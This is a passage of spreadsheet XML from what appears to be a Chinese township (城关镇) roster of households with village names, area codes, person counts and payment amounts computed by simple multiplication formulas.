        <v>312</v>
      </c>
      <c r="F709" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G709" s="17">
        <v>1</v>
      </c>
      <c r="H709" s="18">
        <v>365</v>
      </c>
      <c r="I709" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J709" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K709" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="710" customHeight="1" spans="1:11">
      <c r="A710" s="16" t="s">
        <v>1914</v>
      </c>
      <c r="B710" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C710" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D710" s="17" t="s">
        <v>1915</v>
      </c>
      <c r="E710" s="17" t="s">
        <v>1916</v>
      </c>
      <c r="F710" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G710" s="17">
        <v>2</v>
      </c>
      <c r="H710" s="18">
        <v>325</v>
      </c>
      <c r="I710" s="17">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J710" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K710" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="711" customHeight="1" spans="1:11">
      <c r="A711" s="16" t="s">
        <v>1917</v>
      </c>
      <c r="B711" s="17" t="str">
        <f>B710</f>
        <v>城关镇</v>
      </c>
      <c r="C711" s="17" t="str">
        <f>C710</f>
        <v>城关中华</v>
      </c>
      <c r="D711" s="16" t="s">
        <v>1918</v>
      </c>
      <c r="E711" s="16" t="s">
        <v>1411</v>
      </c>
      <c r="F711" s="17" t="str">
        <f>F710</f>
        <v>4113210108</v>
      </c>
      <c r="G711" s="17"/>
      <c r="H711" s="17"/>
      <c r="I711" s="17"/>
      <c r="J711" s="17"/>
      <c r="K711" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="712" customHeight="1" spans="1:11">
      <c r="A712" s="16" t="s">
        <v>1919</v>
      </c>
      <c r="B712" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C712" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D712" s="17" t="s">
        <v>1920</v>
      </c>
      <c r="E712" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F712" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G712" s="17">
        <v>1</v>
      </c>
      <c r="H712" s="18">
        <v>365</v>
      </c>
      <c r="I712" s="17">
        <f>H712*G712</f>
        <v>365</v>
      </c>
      <c r="J712" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K712" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="713" customHeight="1" spans="1:11">
      <c r="A713" s="16" t="s">
        <v>1921</v>
      </c>
      <c r="B713" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C713" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D713" s="17" t="s">
        <v>1922</v>
      </c>
      <c r="E713" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F713" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G713" s="17">
        <v>2</v>
      </c>
      <c r="H713" s="18">
        <v>325</v>
      </c>
      <c r="I713" s="17">
        <f>H713*G713</f>
        <v>650</v>
      </c>
      <c r="J713" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K713" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="714" customHeight="1" spans="1:11">
      <c r="A714" s="16" t="s">
        <v>1923</v>
      </c>
      <c r="B714" s="17" t="str">
        <f>B713</f>
        <v>城关镇</v>
      </c>
      <c r="C714" s="17" t="str">
        <f>C713</f>
        <v>城关中华</v>
      </c>
      <c r="D714" s="28" t="s">
        <v>1924</v>
      </c>
      <c r="E714" s="24" t="s">
        <v>542</v>
      </c>
      <c r="F714" s="17" t="str">
        <f>F713</f>
        <v>4113210108</v>
      </c>
      <c r="G714" s="17"/>
      <c r="H714" s="17"/>
      <c r="I714" s="17"/>
      <c r="J714" s="17"/>
      <c r="K714" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="715" customHeight="1" spans="1:11">
      <c r="A715" s="16" t="s">
        <v>1925</v>
      </c>
      <c r="B715" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C715" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D715" s="17" t="s">
        <v>1926</v>
      </c>
      <c r="E715" s="17" t="s">
        <v>814</v>
      </c>
      <c r="F715" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G715" s="17">
        <v>1</v>
      </c>
      <c r="H715" s="18">
        <v>365</v>
      </c>
      <c r="I715" s="17">
        <f>H715*G715</f>
        <v>365</v>
      </c>
      <c r="J715" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K715" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="716" customHeight="1" spans="1:11">
      <c r="A716" s="16" t="s">
        <v>1927</v>
      </c>
      <c r="B716" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C716" s="17" t="s">
        <v>1928</v>
      </c>
      <c r="D716" s="17" t="s">
        <v>1929</v>
      </c>
      <c r="E716" s="17" t="s">
        <v>1930</v>
      </c>
      <c r="F716" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G716" s="17">
        <v>1</v>
      </c>
      <c r="H716" s="17">
        <v>420</v>
      </c>
      <c r="I716" s="17">
        <f>H716*G716</f>
        <v>420</v>
      </c>
      <c r="J716" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K716" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="717" customHeight="1" spans="1:11">
      <c r="A717" s="16" t="s">
        <v>1931</v>
      </c>
      <c r="B717" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C717" s="17" t="s">
        <v>1932</v>
      </c>
      <c r="D717" s="17" t="s">
        <v>1933</v>
      </c>
      <c r="E717" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F717" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G717" s="17">
        <v>1</v>
      </c>
      <c r="H717" s="18">
        <v>365</v>
      </c>
      <c r="I717" s="17">
        <f>H717*G717</f>
        <v>365</v>
      </c>
      <c r="J717" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K717" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="718" customHeight="1" spans="1:11">
      <c r="A718" s="16" t="s">
        <v>1934</v>
      </c>
      <c r="B718" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C718" s="17" t="s">
        <v>1932</v>
      </c>
      <c r="D718" s="17" t="s">
        <v>1935</v>
      </c>
      <c r="E718" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F718" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G718" s="17">
        <v>2</v>
      </c>
      <c r="H718" s="18">
        <v>325</v>
      </c>
      <c r="I718" s="17">
        <f>H718*G718</f>
        <v>650</v>
      </c>
      <c r="J718" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K718" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="719" customHeight="1" spans="1:11">
      <c r="A719" s="16" t="s">
        <v>1936</v>
      </c>
      <c r="B719" s="17" t="str">
        <f>B718</f>
        <v>城关镇</v>
      </c>
      <c r="C719" s="17" t="str">
        <f>C718</f>
        <v>城关镇东北</v>
      </c>
      <c r="D719" s="28" t="s">
        <v>1937</v>
      </c>
      <c r="E719" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F719" s="17" t="str">
        <f>F718</f>
        <v>4113210103</v>
      </c>
      <c r="G719" s="17"/>
      <c r="H719" s="17"/>
      <c r="I719" s="17"/>
      <c r="J719" s="17"/>
      <c r="K719" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="720" customHeight="1" spans="1:11">
      <c r="A720" s="16" t="s">
        <v>1938</v>
      </c>
      <c r="B720" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C720" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D720" s="17" t="s">
        <v>1939</v>
      </c>
      <c r="E720" s="17" t="s">
        <v>1940</v>
      </c>
      <c r="F720" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G720" s="17">
        <v>1</v>
      </c>
      <c r="H720" s="18">
        <v>365</v>
      </c>
      <c r="I720" s="17">
        <f>H720*G720</f>
        <v>365</v>
      </c>
      <c r="J720" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K720" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="721" customHeight="1" spans="1:11">
      <c r="A721" s="16" t="s">
        <v>1941</v>
      </c>
      <c r="B721" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C721" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D721" s="17" t="s">
        <v>1942</v>
      </c>
      <c r="E721" s="17" t="s">
        <v>1943</v>
      </c>
      <c r="F721" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G721" s="17">
        <v>1</v>
      </c>
      <c r="H721" s="18">
        <v>365</v>
      </c>
      <c r="I721" s="17">
        <f>H721*G721</f>
        <v>365</v>
      </c>
      <c r="J721" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K721" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="722" customHeight="1" spans="1:11">
      <c r="A722" s="16" t="s">
        <v>1944</v>
      </c>
      <c r="B722" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C722" s="17" t="s">
        <v>1221</v>
      </c>
      <c r="D722" s="17" t="s">
        <v>1945</v>
      </c>
      <c r="E722" s="17" t="s">
        <v>1946</v>
      </c>
      <c r="F722" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G722" s="17">
        <v>1</v>
      </c>
      <c r="H722" s="18">
        <v>365</v>
      </c>
      <c r="I722" s="17">
        <f>H722*G722</f>
        <v>365</v>
      </c>
      <c r="J722" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K722" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="723" customHeight="1" spans="1:11">
      <c r="A723" s="16" t="s">
        <v>1947</v>
      </c>
      <c r="B723" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C723" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D723" s="17" t="s">
        <v>1948</v>
      </c>
      <c r="E723" s="17" t="s">
        <v>1949</v>
      </c>
      <c r="F723" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G723" s="17">
        <v>1</v>
      </c>
      <c r="H723" s="18">
        <v>365</v>
      </c>
      <c r="I723" s="17">
        <f>H723*G723</f>
        <v>365</v>
      </c>
      <c r="J723" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K723" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="724" customHeight="1" spans="1:11">
      <c r="A724" s="16" t="s">
        <v>1950</v>
      </c>
      <c r="B724" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C724" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D724" s="17" t="s">
        <v>1951</v>
      </c>
      <c r="E724" s="17" t="s">
        <v>1952</v>
      </c>
      <c r="F724" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G724" s="17">
        <v>2</v>
      </c>
      <c r="H724" s="18">
        <v>325</v>
      </c>
      <c r="I724" s="17">
        <f>H724*G724</f>
        <v>650</v>
      </c>
      <c r="J724" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K724" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="725" customHeight="1" spans="1:11">
      <c r="A725" s="16" t="s">
        <v>1953</v>
      </c>
      <c r="B725" s="17" t="str">
        <f>B724</f>
        <v>城关镇</v>
      </c>
      <c r="C725" s="17" t="str">
        <f>C724</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D725" s="19" t="s">
        <v>1954</v>
      </c>
      <c r="E725" s="19" t="s">
        <v>1955</v>
      </c>
      <c r="F725" s="17" t="str">
        <f>F724</f>
        <v>4113210108</v>
      </c>
      <c r="G725" s="17"/>
      <c r="H725" s="17"/>
      <c r="I725" s="17"/>
      <c r="J725" s="17"/>
      <c r="K725" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="726" customHeight="1" spans="1:11">
      <c r="A726" s="16" t="s">
        <v>1956</v>
      </c>
      <c r="B726" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C726" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D726" s="17" t="s">
        <v>1957</v>
      </c>
      <c r="E726" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F726" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G726" s="17">
        <v>1</v>
      </c>
      <c r="H726" s="18">
        <v>365</v>
      </c>
      <c r="I726" s="17">
        <f>H726*G726</f>
        <v>365</v>
      </c>
      <c r="J726" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K726" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="727" customHeight="1" spans="1:11">
      <c r="A727" s="16" t="s">
        <v>1958</v>
      </c>
      <c r="B727" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C727" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D727" s="17" t="s">
        <v>1959</v>
      </c>
      <c r="E727" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F727" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G727" s="17">
        <v>1</v>
      </c>
      <c r="H727" s="18">
        <v>365</v>
      </c>
      <c r="I727" s="17">
        <f>H727*G727</f>
        <v>365</v>
      </c>
      <c r="J727" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K727" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="728" customHeight="1" spans="1:11">
      <c r="A728" s="16" t="s">
        <v>1960</v>
      </c>
      <c r="B728" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C728" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D728" s="17" t="s">
        <v>1961</v>
      </c>
      <c r="E728" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F728" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G728" s="17">
        <v>2</v>
      </c>
      <c r="H728" s="18">
        <v>325</v>
      </c>
      <c r="I728" s="17">
        <f>H728*G728</f>
        <v>650</v>
      </c>
      <c r="J728" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K728" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="729" customHeight="1" spans="1:11">
      <c r="A729" s="16" t="s">
        <v>1962</v>
      </c>
      <c r="B729" s="17" t="str">
        <f>B728</f>
        <v>城关镇</v>
      </c>
      <c r="C729" s="17" t="str">
        <f>C728</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D729" s="28" t="s">
        <v>1963</v>
      </c>
      <c r="E729" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F729" s="17" t="str">
        <f>F728</f>
        <v>4113210108</v>
      </c>
      <c r="G729" s="17"/>
      <c r="H729" s="17"/>
      <c r="I729" s="17"/>
      <c r="J729" s="17"/>
      <c r="K729" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="730" customHeight="1" spans="1:11">
      <c r="A730" s="16" t="s">
        <v>1964</v>
      </c>
      <c r="B730" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C730" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D730" s="17" t="s">
        <v>1965</v>
      </c>
      <c r="E730" s="17" t="s">
        <v>1258</v>
      </c>
      <c r="F730" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G730" s="17">
        <v>2</v>
      </c>
      <c r="H730" s="18">
        <v>345</v>
      </c>
      <c r="I730" s="17">
        <f>H730*G730</f>
        <v>690</v>
      </c>
      <c r="J730" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K730" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="731" customHeight="1" spans="1:11">
      <c r="A731" s="16" t="s">
        <v>1966</v>
      </c>
      <c r="B731" s="17" t="str">
        <f>B730</f>
        <v>城关镇</v>
      </c>
      <c r="C731" s="17" t="str">
        <f>C730</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D731" s="28" t="s">
        <v>1967</v>
      </c>
      <c r="E731" s="16" t="s">
        <v>1968</v>
      </c>
      <c r="F731" s="17" t="str">
        <f>F730</f>
        <v>4113210108</v>
      </c>
      <c r="G731" s="17"/>
      <c r="H731" s="17"/>
      <c r="I731" s="17"/>
      <c r="J731" s="17"/>
      <c r="K731" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="732" customHeight="1" spans="1:11">
      <c r="A732" s="16" t="s">
        <v>1969</v>
      </c>
      <c r="B732" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C732" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D732" s="17" t="s">
        <v>1970</v>
      </c>
      <c r="E732" s="17" t="s">
        <v>1971</v>
      </c>
      <c r="F732" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G732" s="17">
        <v>1</v>
      </c>
      <c r="H732" s="18">
        <v>365</v>
      </c>
      <c r="I732" s="17">
        <f t="shared" ref="I732:I737" si="31">H732*G732</f>
        <v>365</v>
      </c>
      <c r="J732" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K732" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="733" customHeight="1" spans="1:11">
      <c r="A733" s="16" t="s">
        <v>1972</v>
      </c>
      <c r="B733" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C733" s="17" t="s">
        <v>1973</v>
      </c>
      <c r="D733" s="17" t="s">
        <v>1974</v>
      </c>
      <c r="E733" s="17" t="s">
        <v>1226</v>
      </c>
      <c r="F733" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G733" s="17">
        <v>1</v>
      </c>
      <c r="H733" s="18">
        <v>365</v>
      </c>
      <c r="I733" s="17">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J733" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K733" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="734" customHeight="1" spans="1:11">
      <c r="A734" s="16" t="s">
        <v>1976</v>
      </c>
      <c r="B734" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C734" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D734" s="17" t="s">
        <v>1977</v>
      </c>
      <c r="E734" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F734" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G734" s="17">
        <v>1</v>
      </c>
      <c r="H734" s="18">
        <v>365</v>
      </c>
      <c r="I734" s="17">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J734" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K734" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="735" customHeight="1" spans="1:11">
      <c r="A735" s="16" t="s">
        <v>1978</v>
      </c>
      <c r="B735" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C735" s="17" t="s">
        <v>1979</v>
      </c>
      <c r="D735" s="17" t="s">
        <v>1980</v>
      </c>
      <c r="E735" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F735" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G735" s="17">
        <v>1</v>
      </c>
      <c r="H735" s="18">
        <v>365</v>
      </c>
      <c r="I735" s="17">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J735" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K735" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="736" customHeight="1" spans="1:11">
      <c r="A736" s="16" t="s">
        <v>1981</v>
      </c>
      <c r="B736" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C736" s="17" t="s">
        <v>1979</v>
      </c>
      <c r="D736" s="17" t="s">
        <v>1982</v>
      </c>
      <c r="E736" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F736" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G736" s="17">
        <v>1</v>
      </c>
      <c r="H736" s="18">
        <v>365</v>
      </c>
      <c r="I736" s="17">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J736" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K736" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="737" customHeight="1" spans="1:11">
      <c r="A737" s="16" t="s">
        <v>1983</v>
      </c>
      <c r="B737" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C737" s="17" t="s">
        <v>1984</v>
      </c>
      <c r="D737" s="17" t="s">
        <v>1985</v>
      </c>
      <c r="E737" s="17" t="s">
        <v>1986</v>
      </c>
      <c r="F737" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G737" s="17">
        <v>2</v>
      </c>
      <c r="H737" s="18">
        <v>325</v>
      </c>
      <c r="I737" s="17">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J737" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K737" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="738" customHeight="1" spans="1:11">
      <c r="A738" s="16" t="s">
        <v>1987</v>
      </c>
      <c r="B738" s="17" t="str">
        <f>B737</f>
        <v>城关镇</v>
      </c>
      <c r="C738" s="17" t="str">
        <f>C737</f>
        <v>中华社区九组</v>
      </c>
      <c r="D738" s="23" t="s">
        <v>1988</v>
      </c>
      <c r="E738" s="23" t="s">
        <v>1989</v>
      </c>
      <c r="F738" s="17" t="str">
        <f>F737</f>
        <v>4113210108</v>
      </c>
      <c r="G738" s="17"/>
      <c r="H738" s="17"/>
      <c r="I738" s="17"/>
      <c r="J738" s="17"/>
      <c r="K738" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="739" customHeight="1" spans="1:11">
      <c r="A739" s="16" t="s">
        <v>1990</v>
      </c>
      <c r="B739" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C739" s="17" t="s">
        <v>1991</v>
      </c>
      <c r="D739" s="17" t="s">
        <v>1992</v>
      </c>
      <c r="E739" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F739" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G739" s="17">
        <v>1</v>
      </c>
      <c r="H739" s="18">
        <v>365</v>
      </c>
      <c r="I739" s="17">
        <f t="shared" ref="I739:I751" si="32">H739*G739</f>
        <v>365</v>
      </c>
      <c r="J739" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K739" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="740" customHeight="1" spans="1:11">
      <c r="A740" s="16" t="s">
        <v>1993</v>
      </c>
      <c r="B740" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C740" s="17" t="s">
        <v>1994</v>
      </c>
      <c r="D740" s="17" t="s">
        <v>1995</v>
      </c>
      <c r="E740" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F740" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G740" s="17">
        <v>1</v>
      </c>
      <c r="H740" s="18">
        <v>365</v>
      </c>
      <c r="I740" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J740" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K740" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="741" customHeight="1" spans="1:11">
      <c r="A741" s="16" t="s">
        <v>1996</v>
      </c>
      <c r="B741" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C741" s="17" t="s">
        <v>1994</v>
      </c>
      <c r="D741" s="17" t="s">
        <v>1997</v>
      </c>
      <c r="E741" s="17" t="s">
        <v>1998</v>
      </c>
      <c r="F741" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G741" s="17">
        <v>1</v>
      </c>
      <c r="H741" s="18">
        <v>365</v>
      </c>
      <c r="I741" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J741" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K741" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="742" customHeight="1" spans="1:11">
      <c r="A742" s="16" t="s">
        <v>1999</v>
      </c>
      <c r="B742" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C742" s="17" t="s">
        <v>1991</v>
      </c>
      <c r="D742" s="17" t="s">
        <v>2000</v>
      </c>
      <c r="E742" s="17" t="s">
        <v>612</v>
      </c>
      <c r="F742" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G742" s="17">
        <v>1</v>
      </c>
      <c r="H742" s="18">
        <v>365</v>
      </c>
      <c r="I742" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J742" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K742" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="743" customHeight="1" spans="1:11">
      <c r="A743" s="16" t="s">
        <v>2001</v>
      </c>
      <c r="B743" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C743" s="17" t="s">
        <v>1994</v>
      </c>
      <c r="D743" s="17" t="s">
        <v>2002</v>
      </c>
      <c r="E743" s="17" t="s">
        <v>2003</v>
      </c>
      <c r="F743" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G743" s="17">
        <v>1</v>
      </c>
      <c r="H743" s="18">
        <v>365</v>
      </c>
      <c r="I743" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J743" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K743" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="744" customHeight="1" spans="1:11">
      <c r="A744" s="16" t="s">
        <v>2004</v>
      </c>
      <c r="B744" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C744" s="17" t="s">
        <v>2005</v>
      </c>
      <c r="D744" s="17" t="s">
        <v>2006</v>
      </c>
      <c r="E744" s="17" t="s">
        <v>2007</v>
      </c>
      <c r="F744" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G744" s="17">
        <v>1</v>
      </c>
      <c r="H744" s="18">
        <v>365</v>
      </c>
      <c r="I744" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J744" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K744" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="745" customHeight="1" spans="1:11">
      <c r="A745" s="16" t="s">
        <v>2008</v>
      </c>
      <c r="B745" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C745" s="17" t="s">
        <v>2009</v>
      </c>
      <c r="D745" s="17" t="s">
        <v>2010</v>
      </c>
      <c r="E745" s="17" t="s">
        <v>2011</v>
      </c>
      <c r="F745" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G745" s="17">
        <v>1</v>
      </c>
      <c r="H745" s="18">
        <v>365</v>
      </c>
      <c r="I745" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J745" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K745" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="746" customHeight="1" spans="1:11">
      <c r="A746" s="16" t="s">
        <v>2012</v>
      </c>
      <c r="B746" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C746" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D746" s="17" t="s">
        <v>2013</v>
      </c>
      <c r="E746" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F746" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G746" s="17">
        <v>1</v>
      </c>
      <c r="H746" s="18">
        <v>365</v>
      </c>
      <c r="I746" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J746" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K746" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="747" customHeight="1" spans="1:11">
      <c r="A747" s="16" t="s">
        <v>2014</v>
      </c>
      <c r="B747" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C747" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D747" s="17" t="s">
        <v>2015</v>
      </c>
      <c r="E747" s="17" t="s">
        <v>2016</v>
      </c>
      <c r="F747" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G747" s="17">
        <v>1</v>
      </c>
      <c r="H747" s="18">
        <v>365</v>
      </c>
      <c r="I747" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J747" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K747" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="748" customHeight="1" spans="1:11">
      <c r="A748" s="16" t="s">
        <v>2017</v>
      </c>
      <c r="B748" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C748" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D748" s="17" t="s">
        <v>2018</v>
      </c>
      <c r="E748" s="17" t="s">
        <v>2019</v>
      </c>
      <c r="F748" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G748" s="17">
        <v>1</v>
      </c>
      <c r="H748" s="18">
        <v>365</v>
      </c>
      <c r="I748" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J748" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K748" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="749" customHeight="1" spans="1:11">
      <c r="A749" s="16" t="s">
        <v>2020</v>
      </c>
      <c r="B749" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C749" s="17" t="s">
        <v>2021</v>
      </c>
      <c r="D749" s="17" t="s">
        <v>2022</v>
      </c>
      <c r="E749" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F749" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G749" s="17">
        <v>1</v>
      </c>
      <c r="H749" s="18">
        <v>365</v>
      </c>
      <c r="I749" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J749" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K749" s="17" t="s">
        <v>225</v>
      </c>
    </row>
